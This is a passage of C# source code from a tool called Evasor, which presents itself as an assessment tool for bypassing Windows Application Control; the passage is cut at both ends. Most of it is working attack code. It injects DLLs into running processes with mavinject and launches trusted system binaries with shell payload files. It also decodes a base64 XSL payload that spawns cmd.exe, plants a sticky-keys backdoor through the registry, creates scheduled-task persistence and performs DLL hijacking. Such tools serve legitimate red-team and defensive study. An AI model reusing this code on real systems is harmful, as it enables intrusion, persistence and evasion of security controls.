| 228 | private static void Scan_for_resource_hijacking() 229 | { 230 | Console.ForegroundColor = ConsoleColor.Cyan; 231 | Console.WriteLine("______________________________________________________________________________________________________________________________"); 232 | Console.WriteLine("|Scan for resource hijacking files (xml,config,json,bat,cmd,ps1,vbs,ini,js,exe,dll,mui,msi,yaml,lib,inf,reg,log,htm,hta,sys).|"); 233 | Console.WriteLine("|____________________________________________________________________________________________________________________________|"); 234 | Console.ForegroundColor = ConsoleColor.Gray; 235 | Console.ForegroundColor = ConsoleColor.Yellow; 236 | Console.WriteLine("Please wait while scanning the entire disk... It can take a while :("); 237 | Console.ForegroundColor = ConsoleColor.Gray; 238 | 239 | // Start with drives if you have to search the entire computer. 240 | string[] drives = System.Environment.GetLogicalDrives(); 241 | 242 | foreach (string dr in drives) 243 | { 244 | System.IO.DriveInfo di = new System.IO.DriveInfo(dr); 245 | 246 | // Here we skip the drive if it is not ready to be read. This 247 | // is not necessarily the appropriate action in all scenarios. 248 | if (!di.IsReady) 249 | { 250 | Console.WriteLine("The drive {0} could not be read", di.Name); 251 | continue; 252 | } 253 | System.IO.DirectoryInfo rootDir = di.RootDirectory; 254 | WalkDirectoryTree(rootDir); 255 | } 256 | 257 | // Write out all the files that could not be processed. 258 | Console.WriteLine("Files with restricted access:"); 259 | Console.ForegroundColor = ConsoleColor.Yellow; 260 | foreach (string s in log) 261 | { 262 | Console.WriteLine(s); 263 | } 264 | Console.ForegroundColor = ConsoleColor.Gray; 265 | // Keep the console window open in debug mode. 
266 | } 267 | 268 | private static void Scan_Vulnerable_Process_To_Dll_Injection(string dll) 269 | { 270 | Console.ForegroundColor = ConsoleColor.Cyan; 271 | Console.WriteLine("___________________________________________________"); 272 | Console.WriteLine("|Scanning for Process vulnerable to DLL Injection!|"); 273 | Console.WriteLine("|_________________________________________________|"); 274 | Console.ForegroundColor = ConsoleColor.Gray; 275 | 276 | Process[] processlist = Process.GetProcesses(); 277 | 278 | foreach (Process theprocess in processlist) 279 | { 280 | Process process = new Process(); 281 | process.StartInfo.FileName = @"C:\Windows\System32\mavinject.exe"; 282 | if (theprocess.ProcessName != Process.GetCurrentProcess().ProcessName && theprocess.ProcessName != "mavinject" && theprocess.ProcessName != Process.GetCurrentProcess().ProcessName + ".vshost") 283 | { 284 | process.StartInfo.Arguments = " " + theprocess.Id.ToString() + " /INJECTRUNNING " + PATH_OF_Evasor + dll; 285 | process.StartInfo.ErrorDialog = true; 286 | process.StartInfo.UseShellExecute = false; 287 | process.StartInfo.RedirectStandardOutput = true; 288 | process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden; 289 | process.Start(); 290 | process.WaitForExit(); 291 | if (process.ExitCode == 0) 292 | { 293 | string owner = GetProcessExtraInformation(theprocess.Id); 294 | Console.Write("Process:{0} PID:{1} Owner:{2} is ", theprocess.ProcessName, theprocess.Id, owner); 295 | Console.ForegroundColor = ConsoleColor.Green; 296 | Console.WriteLine("DLL Injectable "); 297 | Console.ForegroundColor = ConsoleColor.Gray; 298 | list_of_injectable_process.Add(theprocess.ProcessName + "^" + theprocess.Id + "^" + owner); 299 | Console.ForegroundColor = ConsoleColor.DarkGreen; 300 | printPremissiomns(theprocess); 301 | Console.ForegroundColor = ConsoleColor.Gray; 302 | } 303 | else 304 | { 305 | Console.WriteLine("Process:{0} PID:{1} Owner:{2}", theprocess.ProcessName, theprocess.Id, 
GetProcessExtraInformation(theprocess.Id)); 306 | } 307 | } 308 | } 309 | } 310 | 311 | private static string GetProcessExtraInformation(int processId) 312 | { 313 | // Query the Win32_Process 314 | string query = "Select * From Win32_Process Where ProcessID = " + processId; 315 | ManagementObjectSearcher searcher = new ManagementObjectSearcher(query); 316 | ManagementObjectCollection processList = searcher.Get(); 317 | 318 | // Create a dynamic object to store some properties on it 319 | dynamic response = new ExpandoObject(); 320 | response.Description = ""; 321 | response.Username = "Unknown"; 322 | 323 | foreach (ManagementObject obj in processList) 324 | { 325 | // Retrieve username 326 | string[] argList = new string[] { string.Empty, string.Empty }; 327 | int returnVal = Convert.ToInt32(obj.InvokeMethod("GetOwner", argList)); 328 | if (returnVal == 0) 329 | { 330 | // return Username 331 | response.Username = argList[0]; 332 | return response.Username; 333 | } 334 | else 335 | { 336 | return "SYSTEM | LOCAL SERVICE | NETWOTK SERVICE"; 337 | } 338 | } 339 | return string.Empty; 340 | } 341 | 342 | private static string take_screen_shot(string imagePath) 343 | { 344 | try 345 | { 346 | var image = ScreenCapture.CaptureDesktop(); 347 | image.Save(PATH_OF_Evasor + @"\IMAGES\" + imagePath, ImageFormat.Jpeg); 348 | Console.WriteLine(PATH_OF_Evasor + @"\IMAGES\" + imagePath + " Saved !!!"); 349 | return PATH_OF_Evasor + @"\IMAGES\" + imagePath; 350 | } 351 | catch (Exception ex) 352 | { 353 | return string.Empty; 354 | } 355 | } 356 | 357 | private static void Help() 358 | { 359 | 360 | Console.WriteLine(@""" 361 | Evasor Tool Description: 362 | The Evasor is an automated security assessment tool which locates existing executables on the Windows operating system that can be used to bypass any Application Control rules. 
363 | It is very easy to use, quick, saves time and fully automated which generates for you a report including description, screenshots and mitigations suggestions, suites for both blue and red teams in the assessment of a post - exploitation phase. 364 | 365 | The overall goals of the tool: 366 | 1. Locating executable files that can be used to bypass the Application Control! 367 | • Retrieving the all running processes relative paths 368 | • Checking every process (executable file) if it vulnerable to DLL Injection by: 369 | 1. Running “MavInject” Microsoft component from path C:\Windows\System32\mavinject.exe with default parameters. 370 | 2. Checking the exit code of the MavInject execution, if the process exited normally it means that the process is vulnerable to DLL Injection and can be used to bypass the Application Control. 371 | 2. Locating processes that vulnerable to DLL Hijacking! 372 | • Retrieving the all running processes 373 | • For each running Process: 374 | 1. Retrieving the loaded process modules 375 | 2. Checking if there is a permission to write data into the directory of the working process by creating an empty file with the name of the loaded module (DLL) or overwriting an existence module file on the working process directory. 376 | 3. If the write operation succeeds – it seems that the process is vulnerable to DLL Hijacking. 377 | 3. Locating for potential hijackable resource files 378 | • Searching for specific files on the computer by their extension. 379 | • Trying to replace that files to another place in order to validate that the file can be replaceable and finally, potentially vulnerable to Resource Hijacking. 380 | • Extensions: xml,config,json,bat,cmd,ps1,vbs,ini,js,exe,dll,msi,yaml,lib,inf,reg,log,htm,hta,sys,rsp 381 | 4. 
Generating an automatic assessment report word document includes a description of tests and screenshots taken."""); 382 | 383 | Console.ReadLine(); 384 | } 385 | 386 | private static void console_AppControl_Bypass_prints() 387 | { 388 | list_of_potential_executables_that_can_bypass_appControl.Clear(); 389 | list_of_available_executables_to_bypass_appControl = new List(); 390 | search_for_executables_that_can_bypass_appControl(); 391 | proof_Of_Concepts = new List(); 392 | proof_Of_Concepts_Pictures = new List(); 393 | Console.ForegroundColor = ConsoleColor.Yellow; 394 | Console.WriteLine("___________________________________________________________________________________________________________________________________________"); 395 | Console.ForegroundColor = ConsoleColor.Gray; 396 | Console.WriteLine("The Results are:"); 397 | Console.ForegroundColor = ConsoleColor.Yellow; 398 | Console.WriteLine("___________________________________________________________________________________________________________________________________________"); 399 | Console.ForegroundColor = ConsoleColor.Gray; 400 | while (true) 401 | { 402 | int executableIndex = 0; 403 | foreach (string executable in list_of_available_executables_to_bypass_appControl) 404 | { 405 | Console.WriteLine(executableIndex.ToString() + "." 
+ executable); 406 | executableIndex++; 407 | } 408 | Console.ForegroundColor = ConsoleColor.Yellow; 409 | Console.WriteLine("___________________________________________________________________________________________________________________________________________"); 410 | Console.ForegroundColor = ConsoleColor.Gray; 411 | Console.WriteLine("Which executable to execute ?(0-" + (executableIndex - 1).ToString() + ")"); 412 | int executableIndexToExecute = int.Parse(Console.ReadLine()); 413 | Console.ForegroundColor = ConsoleColor.Yellow; 414 | Console.WriteLine("___________________________________________________________________________________________________________________________________________"); 415 | Console.ForegroundColor = ConsoleColor.Gray; 416 | Process process = new Process(); 417 | process.StartInfo.FileName = list_of_available_executables_to_bypass_appControl[executableIndexToExecute]; 418 | Console.BackgroundColor = ConsoleColor.DarkGreen; 419 | Console.ForegroundColor = ConsoleColor.White; 420 | if (process.StartInfo.FileName.Contains("cmd") 421 | || process.StartInfo.FileName.Contains("Powershell") 422 | || process.StartInfo.FileName.Contains("regedit.exe") 423 | || process.StartInfo.FileName.Contains("regedt32.exe")) 424 | { 425 | Console.WriteLine("POC --> " + process.StartInfo.FileName); 426 | proof_Of_Concepts.Add("POC --> " + process.StartInfo.FileName); 427 | } 428 | else if (process.StartInfo.FileName.Contains("Pubprn.vbs")) 429 | { 430 | dll = @"\DLLs\Shell.sct"; 431 | process.StartInfo.Arguments = @" 127.0.0.1 script:" + PATH_OF_Evasor + dll; 432 | Console.WriteLine(File.ReadAllText(PATH_OF_Evasor + dll)); 433 | Console.WriteLine("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments); 434 | proof_Of_Concepts.Add("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments); 435 | } 436 | else if (process.StartInfo.FileName.Contains("Tracker.exe")) 437 | { 438 | dll = @"\DLLs\cmd.dll"; 439 | 
process.StartInfo.Arguments = @" /d " + PATH_OF_Evasor + dll + " /c " + @"C:\Windows\write.exe"; 440 | Console.WriteLine("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments); 441 | proof_Of_Concepts.Add("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments); 442 | } 443 | else if (process.StartInfo.FileName.Contains("at.exe")) 444 | { 445 | Console.WriteLine("Enter the time like '00:00' to execute the binary?"); 446 | string timeToExecute = Console.ReadLine(); 447 | Console.WriteLine("Enter path to executible to run?"); 448 | file_To_Execute = Console.ReadLine(); 449 | process.StartInfo.Arguments = @" at " + timeToExecute + " /interactive /every:m,t,w,th,f,s,su " + file_To_Execute; 450 | Console.WriteLine("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments); 451 | proof_Of_Concepts.Add("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments); 452 | } 453 | else if (process.StartInfo.FileName.Contains("winrm.cmd")) 454 | { 455 | file_To_Execute = @"quickconfig"; 456 | process.StartInfo.Arguments = @" " + file_To_Execute; 457 | Console.WriteLine("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments); 458 | proof_Of_Concepts.Add("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments); 459 | } 460 | else if (process.StartInfo.FileName.Contains("SchTasks.exe")) 461 | { 462 | process.StartInfo.Arguments = @" /delete /TN " + "\"" + Process.GetCurrentProcess().ProcessName + "\""; 463 | Console.WriteLine("Enter the time like '00:00' to execute the binary?"); 464 | string timeToExecute = Console.ReadLine(); 465 | Console.WriteLine("Enter path to executible to run?"); 466 | file_To_Execute = Console.ReadLine(); 467 | process.StartInfo.Arguments = @" /Create /SC DAILY /TN " + "\"" + Process.GetCurrentProcess().ProcessName + "\"" + " /TR " + "\"" + file_To_Execute + "\"" + " /ST " + timeToExecute; 468 | Console.WriteLine("POC --> " + process.StartInfo.FileName + 
process.StartInfo.Arguments); 469 | process.StartInfo.Arguments = @" /run /TN " + "\"" + Process.GetCurrentProcess().ProcessName + "\""; 470 | Console.WriteLine("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments); 471 | proof_Of_Concepts.Add("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments); 472 | } 473 | else if (process.StartInfo.FileName.Contains("ATBroker.exe")) 474 | { 475 | Console.WriteLine("Enter path to executible to run?"); 476 | file_To_Execute = Console.ReadLine(); 477 | process.StartInfo.Arguments = @" /start malware"; 478 | Console.WriteLine(@"POC --> set the registry to HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware" + @" /t REG_EXPAND_SZ /v Debugger /d " + "\"" + file_To_Execute + "\"" + " /f"); 479 | Console.WriteLine("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments); 480 | proof_Of_Concepts.Add("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments); 481 | } 482 | else if (process.StartInfo.FileName.Contains("forfiles.exe")) 483 | { 484 | file_To_Execute = @"cmd.exe"; 485 | process.StartInfo.Arguments = @" /p c:\windows\system32 /m notepad.exe /c " + file_To_Execute; 486 | Console.WriteLine("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments); 487 | proof_Of_Concepts.Add("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments); 488 | } 489 | else if (process.StartInfo.FileName.Contains("Regsvc.exe")) 490 | { 491 | file_To_Execute = @"\DLLs\pshell.dll"; 492 | process.StartInfo.Arguments = " /U " + PATH_OF_Evasor + file_To_Execute; 493 | Console.WriteLine("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments); 494 | proof_Of_Concepts.Add("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments); 495 | } 496 | else if (process.StartInfo.FileName.Contains("Regasm.exe")) 497 | { 498 | file_To_Execute = @"\DLLs\pshell.dll"; 499 | process.StartInfo.Arguments = " /U " + PATH_OF_Evasor + 
file_To_Execute; 500 | Console.WriteLine("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments); 501 | proof_Of_Concepts.Add("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments); 502 | } 503 | else if (process.StartInfo.FileName.Contains("wmic.exe")) 504 | { 505 | file_To_Execute = @"cmd.exe"; 506 | process.StartInfo.Arguments = " process" + " call create " + file_To_Execute; 507 | Console.WriteLine("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments); 508 | proof_Of_Concepts.Add("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments); 509 | } 510 | else if (process.StartInfo.FileName.Contains("msiexec")) 511 | { 512 | file_To_Execute = @"\DLLs\powershell.msi"; 513 | process.StartInfo.Arguments = "/quiet" + " " + "/i" + " " + PATH_OF_Evasor + file_To_Execute; 514 | Console.WriteLine("POC --> " + process.StartInfo.FileName + " /quiet /i " + PATH_OF_Evasor + file_To_Execute); 515 | proof_Of_Concepts.Add("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments); 516 | } 517 | else if (process.StartInfo.FileName.Contains("cmstp.exe")) 518 | { 519 | file_To_Execute = @"\DLLs\Shell.inf"; 520 | dll = @"\DLLs\cmd.dll"; 521 | set_File_content_before_original(file_To_Execute, dll); 522 | Console.WriteLine(File.ReadAllText(PATH_OF_Evasor + file_To_Execute)); 523 | Console.WriteLine("POC --> " + process.StartInfo.FileName + " /s " + PATH_OF_Evasor + file_To_Execute); 524 | process.StartInfo.Arguments = "/s" + " " + PATH_OF_Evasor + file_To_Execute; 525 | proof_Of_Concepts.Add("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments); 526 | } 527 | else if (process.StartInfo.FileName.Contains("msbuild.exe")) 528 | { 529 | file_To_Execute = @"\DLLs\Shell.csproj"; 530 | Console.WriteLine(File.ReadAllText(PATH_OF_Evasor + file_To_Execute)); 531 | process.StartInfo.Arguments = " " + PATH_OF_Evasor + file_To_Execute; 532 | Console.WriteLine("POC --> " + process.StartInfo.FileName + 
process.StartInfo.Arguments); 533 | proof_Of_Concepts.Add("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments); 534 | } 535 | else if (process.StartInfo.FileName.Contains("InstallUtil.exe")) 536 | { 537 | file_To_Execute = @"\DLLs\pshell.dll"; 538 | process.StartInfo.Arguments = @"/logfile= /LogToConsole=false /U" + " " + PATH_OF_Evasor + file_To_Execute; 539 | Console.WriteLine("POC --> " + process.StartInfo.FileName + " " + process.StartInfo.Arguments); 540 | proof_Of_Concepts.Add("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments); 541 | } 542 | else if (process.StartInfo.FileName.Contains("dotnet.exe")) 543 | { 544 | file_To_Execute = @"\DLLs\pshell.dll"; 545 | process.StartInfo.Arguments = PATH_OF_Evasor + file_To_Execute; 546 | Console.WriteLine("POC --> " + process.StartInfo.FileName + " " + process.StartInfo.Arguments); 547 | proof_Of_Concepts.Add("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments); 548 | } 549 | else if (process.StartInfo.FileName.Contains("csc.exe")) 550 | { 551 | file_To_Execute = @"\DLLs\Shell.cs"; 552 | dll = @"\DLLs\pshell.dll "; 553 | Console.WriteLine(File.ReadAllText(PATH_OF_Evasor + file_To_Execute)); 554 | Console.ForegroundColor = ConsoleColor.Yellow; 555 | Console.WriteLine("Compile the .cs file and after that you can use InstallUtil.exe to run the DLL created."); 556 | Console.ForegroundColor = ConsoleColor.Gray; 557 | process.StartInfo.Arguments = @" /reference:" + "\"" + @"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" + "\"" + " /out:" + PATH_OF_Evasor + dll + PATH_OF_Evasor + file_To_Execute; 558 | Console.WriteLine("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments); 559 | proof_Of_Concepts.Add("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments); 560 | } 561 | else if (process.StartInfo.FileName.Contains("Cscript.exe") || 
process.StartInfo.FileName.Contains("Wscript.exe")) 562 | { 563 | string payload = "PD94bWwgdmVyc2lvbj0nMS4wJz8+DQo8c3R5bGVzaGVldA0KeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkvWFNML1RyYW5zZm9ybSIgeG1sbnM6bXM9InVybjpzY2hlbWFzLW1pY3Jvc29mdC1jb206eHNsdCINCnhtbG5zOnVzZXI9InBsYWNlaG9sZGVyIg0KdmVyc2lvbj0iMS4wIj4NCjxvdXRwdXQgbWV0aG9kPSJ0ZXh0Ii8+DQoJPG1zOnNjcmlwdCBpbXBsZW1lbnRzLXByZWZpeD0idXNlciIgbGFuZ3VhZ2U9IkpTY3JpcHQiPg0KCTwhW0NEQVRBWw0KCXZhciByID0gbmV3IEFjdGl2ZVhPYmplY3QoIldTY3JpcHQuU2hlbGwiKS5SdW4oImNtZC5leGUiKTsNCgldXT4gPC9tczpzY3JpcHQ+DQo8L3N0eWxlc2hlZXQ+"; 564 | file_To_Execute = @"\DLLs\Shell.vbs"; 565 | dll = @"\DLLs\minimalist.xml"; 566 | File.WriteAllText(PATH_OF_Evasor + @"\DLLs\minimalist.xml", Base64Decode(payload)); 567 | Console.WriteLine(Base64Decode(payload)); 568 | set_File_content_before_original(file_To_Execute, dll); 569 | process.StartInfo.Arguments = " " + PATH_OF_Evasor + file_To_Execute; 570 | Console.WriteLine("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments); 571 | proof_Of_Concepts.Add("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments); 572 | } 573 | else if (process.StartInfo.FileName.Contains("Odbcconf.exe")) 574 | { 575 | file_To_Execute = @"\DLLs\Shell.rsp"; 576 | dll = @"\DLLs\cmd.dll"; 577 | set_File_content_before_original(file_To_Execute, dll); 578 | Console.WriteLine(File.ReadAllText(PATH_OF_Evasor + file_To_Execute)); 579 | process.StartInfo.Arguments = " -f" + " " + PATH_OF_Evasor + file_To_Execute; 580 | Console.WriteLine("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments); 581 | proof_Of_Concepts.Add("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments); 582 | } 583 | else if (process.StartInfo.FileName.Contains("reg.exe")) 584 | { 585 | Console.WriteLine("Enter path for executible to be the backdoor:"); 586 | file_To_Execute = Console.ReadLine(); 587 | Console.ForegroundColor = ConsoleColor.Yellow; 588 | Console.WriteLine("Steeky keys backdoor created press 
5 times the Shift button on your keyboard."); 589 | Console.ForegroundColor = ConsoleColor.Gray; 590 | process.StartInfo.Arguments = " ADD " + "\"" + @"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" + "\"" + @" /t REG_SZ /v Debugger /d " + "\"" + file_To_Execute + "\"" + " /f"; 591 | Console.WriteLine("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments); 592 | proof_Of_Concepts.Add("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments); 593 | } 594 | else if (process.StartInfo.FileName.Contains("fsi.exe")) 595 | { 596 | file_To_Execute = @"\DLLs\Shell.fsscript"; 597 | dll = @"\DLLs\cmd.dll"; 598 | set_File_content_before_original(file_To_Execute, dll); 599 | Console.WriteLine(File.ReadAllText(PATH_OF_Evasor + file_To_Execute)); 600 | process.StartInfo.Arguments = " " + PATH_OF_Evasor + file_To_Execute; 601 | Console.WriteLine("POC --> " + "\"" + process.StartInfo.FileName + "\"" + process.StartInfo.Arguments); 602 | proof_Of_Concepts.Add("POC --> " + "\"" + process.StartInfo.FileName + "\"" + process.StartInfo.Arguments); 603 | } 604 | else if (process.StartInfo.FileName.Contains("rundll32.exe")) 605 | { 606 | dll = @"\DLLs\cmd.dll,#61"; 607 | process.StartInfo.Arguments = " " + PATH_OF_Evasor + dll; 608 | Console.WriteLine("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments); 609 | } 610 | else if (process.StartInfo.FileName.Contains("Mshta.exe")) 611 | { 612 | file_To_Execute = @"\DLLs\Shell.hta"; 613 | process.StartInfo.Arguments = " " + PATH_OF_Evasor + file_To_Execute; 614 | Console.WriteLine(File.ReadAllText(PATH_OF_Evasor + file_To_Execute)); 615 | Console.WriteLine("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments); 616 | } 617 | else if (process.StartInfo.FileName.Contains("csi.exe")) 618 | { 619 | file_To_Execute = @"\DLLs\Shell.txt"; 620 | process.StartInfo.Arguments = " " + PATH_OF_Evasor + file_To_Execute; 621 | 
Console.WriteLine(File.ReadAllText(PATH_OF_Evasor + file_To_Execute)); 622 | Console.WriteLine("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments); 623 | } 624 | else if (process.StartInfo.FileName.Contains("InfDefaultInstall.exe")) 625 | { 626 | file_To_Execute = @"\DLLs\minimalist.sct"; 627 | dll = @"\DLLs\Shady.inf"; 628 | set_File_content_before_original(dll, file_To_Execute); 629 | Console.WriteLine(File.ReadAllText(PATH_OF_Evasor + file_To_Execute)); 630 | process.StartInfo.Arguments = " " + PATH_OF_Evasor + dll; 631 | Console.WriteLine("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments); 632 | } 633 | else if (process.StartInfo.FileName.Contains("Mavinject.exe")) 634 | { 635 | dll = ""; 636 | list_of_injectable_process = new List(); 637 | Console.BackgroundColor = ConsoleColor.Black; 638 | Console.ForegroundColor = ConsoleColor.Gray; 639 | Scan_Vulnerable_Process_To_Dll_Injection(dll); 640 | Console.ForegroundColor = ConsoleColor.Yellow; 641 | Console.WriteLine("___________________________________________________________________________________________________________________________________________"); 642 | Console.ForegroundColor = ConsoleColor.Gray; 643 | Console.WriteLine("The Results are:"); 644 | Console.ForegroundColor = ConsoleColor.Yellow; 645 | Console.WriteLine("___________________________________________________________________________________________________________________________________________"); 646 | Console.ForegroundColor = ConsoleColor.Gray; 647 | proof_Of_Concepts = new List(); 648 | proof_Of_Concepts_Pictures = new List(); 649 | int k = 0; 650 | foreach (string str in list_of_injectable_process) 651 | { 652 | sub_Paths = str.Split('^'); 653 | Console.WriteLine(k.ToString() + "." 
+ sub_Paths[0] + " Owner:" + sub_Paths[2]); 654 | k++; 655 | } 656 | Console.ForegroundColor = ConsoleColor.Yellow; 657 | Console.WriteLine("___________________________________________________________________________________________________________________________________________"); 658 | Console.ForegroundColor = ConsoleColor.Gray; 659 | Console.WriteLine("Which Process to Inject the DLL?(0-" + (k - 1).ToString() + ")"); 660 | int processIndex = int.Parse(Console.ReadLine()); 661 | Console.ForegroundColor = ConsoleColor.Yellow; 662 | Console.WriteLine("___________________________________________________________________________________________________________________________________________"); 663 | Console.ForegroundColor = ConsoleColor.Gray; 664 | sub_Paths = list_of_injectable_process[processIndex].Split('^'); 665 | Process processs = new Process(); 666 | dll = @"\DLLs\cmd.dll"; 667 | processs.StartInfo.FileName = @"C:\Windows\System32\mavinject.exe"; 668 | processs.StartInfo.Arguments = " " + sub_Paths[1] + " /INJECTRUNNING " + PATH_OF_Evasor + dll; 669 | processs.StartInfo.ErrorDialog = true; 670 | processs.StartInfo.UseShellExecute = false; 671 | processs.StartInfo.RedirectStandardOutput = true; 672 | processs.StartInfo.WindowStyle = ProcessWindowStyle.Hidden; 673 | Console.BackgroundColor = ConsoleColor.DarkGreen; 674 | Console.ForegroundColor = ConsoleColor.White; 675 | Console.WriteLine("POC --> " + processs.StartInfo.FileName + processs.StartInfo.Arguments); 676 | proof_Of_Concepts.Add("POC --> " + processs.StartInfo.FileName + processs.StartInfo.Arguments); 677 | Console.BackgroundColor = ConsoleColor.Black; 678 | Console.ForegroundColor = ConsoleColor.Yellow; 679 | Console.WriteLine("___________________________________________________________________________________________________________________________________________"); 680 | Console.ForegroundColor = ConsoleColor.Gray; 681 | Console.WriteLine("Take a screen shot? 
(y/n)"); 682 | if (Console.ReadLine() == "y") 683 | { 684 | proof_Of_Concepts_Pictures.Add(take_screen_shot(Path.GetFileName(sub_Paths[0] + "_" + processIndex.ToString() + "_dll-injection.jpeg"))); 685 | 686 | } 687 | Console.Write("To exit and return to main menu type "); 688 | Console.ForegroundColor = ConsoleColor.Green; 689 | Console.Write("break"); 690 | Console.ForegroundColor = ConsoleColor.Gray; 691 | Console.WriteLine(" else press Enter...."); 692 | if (proof_Of_Concepts_Pictures.Count != 0) 693 | { 694 | ////////////////////////////////////////////////////////////////////////////////////////////////////////////// 695 | Report.Scan_Vulnerable_Process_To_DLL_Injection(list_of_injectable_process, proof_Of_Concepts, proof_Of_Concepts_Pictures); 696 | ////////////////////////////////////////////////////////////////////////////////////////////////////////////// 697 | } 698 | if (Console.ReadLine() == "break") 699 | { 700 | break; 701 | } 702 | } 703 | else 704 | { 705 | dll = @"\DLLs\cmd.dll"; 706 | process.StartInfo.Arguments = " " + PATH_OF_Evasor + dll; 707 | Console.WriteLine("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments); 708 | proof_Of_Concepts.Add("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments); 709 | } 710 | Console.BackgroundColor = ConsoleColor.Black; 711 | Console.ForegroundColor = ConsoleColor.Gray; 712 | process.StartInfo.WindowStyle = ProcessWindowStyle.Normal; 713 | Console.WriteLine("Take a screen shot? 
(y/n)"); 714 | if (Console.ReadLine() == "y") 715 | { 716 | proof_Of_Concepts_Pictures.Add(take_screen_shot(Path.GetFileName(list_of_available_executables_to_bypass_appControl[executableIndexToExecute] + "_" + executableIndexToExecute.ToString() + "_dll-Bypass.jpeg"))); 717 | } 718 | Console.ForegroundColor = ConsoleColor.Gray; 719 | Console.Write("To exit and return to main menu type "); 720 | Console.ForegroundColor = ConsoleColor.Green; 721 | Console.Write("break"); 722 | Console.ForegroundColor = ConsoleColor.Gray; 723 | Console.WriteLine(" else press Enter...."); 724 | if (proof_Of_Concepts_Pictures.Count != 0) 725 | { 726 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 727 | Report.Scan_For_Executibles_That_Can_Bypass_Windows_AppControl(list_of_available_executables_to_bypass_appControl, proof_Of_Concepts, proof_Of_Concepts_Pictures); 728 | ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 729 | } 730 | if (Console.ReadLine() == "break") 731 | { 732 | break; 733 | } 734 | } 735 | } 736 | private static void console_DLL_Hijack_Bypass_prints() 737 | { 738 | List_Of_Hijckable_dlls = new List(); 739 | List_Of_Replaceble_dlls = new List(); 740 | dll = ""; 741 | Scan_Process_Vulnerable_To_Dll_Hijack(dll); 742 | proof_Of_Concepts = new List(); 743 | proof_Of_Concepts_Pictures = new List(); 744 | while (true) 745 | { 746 | int i = 0; 747 | Console.WriteLine("Hijack the DLL? 
(y/n)"); 748 | string poc = Console.ReadLine(); 749 | if (poc == "y") 750 | { 751 | Console.ForegroundColor = ConsoleColor.Yellow; 752 | Console.WriteLine("___________________________________________________________________________________________________________________________________________"); 753 | Console.ForegroundColor = ConsoleColor.Gray; 754 | foreach (string str in List_Of_Hijckable_dlls) 755 | { 756 | Console.WriteLine(i.ToString() + "." + str); 757 | i++; 758 | } 759 | Console.ForegroundColor = ConsoleColor.Yellow; 760 | Console.WriteLine("___________________________________________________________________________________________________________________________________________"); 761 | Console.ForegroundColor = ConsoleColor.Gray; 762 | Console.ForegroundColor = ConsoleColor.Yellow; 763 | Console.WriteLine("___________________________________________________________________________________________________________________________________________"); 764 | Console.ForegroundColor = ConsoleColor.Gray; 765 | Console.WriteLine("Enter one of the follwing DLL's (cmd.dll,x64.dll,x86.dll)."); 766 | dll = Console.ReadLine(); 767 | Console.ForegroundColor = ConsoleColor.Yellow; 768 | Console.WriteLine("___________________________________________________________________________________________________________________________________________"); 769 | Console.ForegroundColor = ConsoleColor.Gray; 770 | Console.WriteLine("Which DLL to Hijack? 
(0-" + (i - 1).ToString() + ")"); 771 | int dllIndex = int.Parse(Console.ReadLine()); 772 | sub_Paths = List_Of_Hijckable_dlls[dllIndex].Split('^'); 773 | System.IO.File.Copy(PATH_OF_Evasor + @"\DLLs\" + dll, sub_Paths[1]); 774 | Console.ForegroundColor = ConsoleColor.Yellow; 775 | Console.WriteLine("___________________________________________________________________________________________________________________________________________"); 776 | Console.ForegroundColor = ConsoleColor.Gray; 777 | Console.WriteLine("Type any key to run " + sub_Paths[0] + "!!!"); 778 | Console.ReadLine(); 779 | Process processs = new Process(); 780 | processs.StartInfo.FileName = sub_Paths[0]; 781 | processs.StartInfo.WindowStyle = ProcessWindowStyle.Normal; 782 | Console.BackgroundColor = ConsoleColor.DarkGreen; 783 | Console.ForegroundColor = ConsoleColor.White; 784 | Console.WriteLine("POC --> Copy " + PATH_OF_Evasor + @"\DLLs\" + dll + " To " + Path.GetDirectoryName(processs.StartInfo.FileName) + " rename it to the DLL you chose and execute " + processs.StartInfo.FileName + 